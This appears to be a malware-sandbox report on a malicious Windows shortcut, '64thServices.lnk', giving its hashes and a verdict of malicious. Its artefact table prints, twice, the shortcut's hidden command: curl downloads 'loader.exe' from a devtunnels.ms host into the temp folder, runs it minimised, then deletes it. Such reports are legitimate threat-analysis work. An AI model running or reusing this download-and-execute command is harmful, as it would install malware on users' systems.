General
Structural Analysis
Config.0
Yara Rules0
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
|
Hash | Hash Value |
|---|---|
| MD5 | 8d5ee25b163aab31fddc2489a58829ce
|
| Sha1 | 015ce60677ad947718de9f07935d948ee23c2c3a
|
| Sha256 | f43f3b219f27796ee12728eab47196ca3f331f5daccbb3e010f82a860ec12367
|
| Sha384 | 717df18a996e09f034c1a3b19cf474d048e951e5a676ecc2379fe22813b182480cb7263b7cb931a76f0ecc466d82fb73
|
| Sha512 | 446613ed8481e08ff4fe91cdfa9cc8a48e9d0b6de9d17addf9dee27e588428c4bd950e83b3fa3cdc67c2df4001f7b1eb7f8a74640e29334143713cb8082fd198
|
| SSDeep | 24:ZOr+8yd0gP67leRfGsiNxdpwyEmyiH0jS6UpIg+dF:ZS+/0gS7legs4jayEDiHnnp6dF
|
| TLSH | 86119462418EE0C7DE931EFE3BA6D6EB5ADC4D815204CF182B10B37F4F10929413525A
|
File Structure
8d5ee25b163aab31fddc2489a58829ce
Malicious
64thServices.lnk
Malicious
[Lnk Summary]
Malicious
Artefacts
|
Name0 | Value |
|---|---|
| LNK: Command Execution | cmd.exe /c "curl -s -L -o %TEMP%\loader.exe https://gl1g7tts-5500.euw.devtunnels.ms/64/loader.exe && start /min cmd /c "%TEMP%\loader.exe & del %TEMP%\loader.exe"" |
8d5ee25b163aab31fddc2489a58829ce (982 B)
File Structure
8d5ee25b163aab31fddc2489a58829ce
Malicious
64thServices.lnk
Malicious
[Lnk Summary]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | cmd.exe /c "curl -s -L -o %TEMP%\loader.exe https://gl1g7tts-5500.euw.devtunnels.ms/64/loader.exe && start /min cmd /c "%TEMP%\loader.exe & del %TEMP%\loader.exe"" Malicious |
8d5ee25b163aab31fddc2489a58829ce > 64thServices.lnk |
You must be signed in to post a comment.
You need a premium account to access this feature.
You must be signed in to post a comment.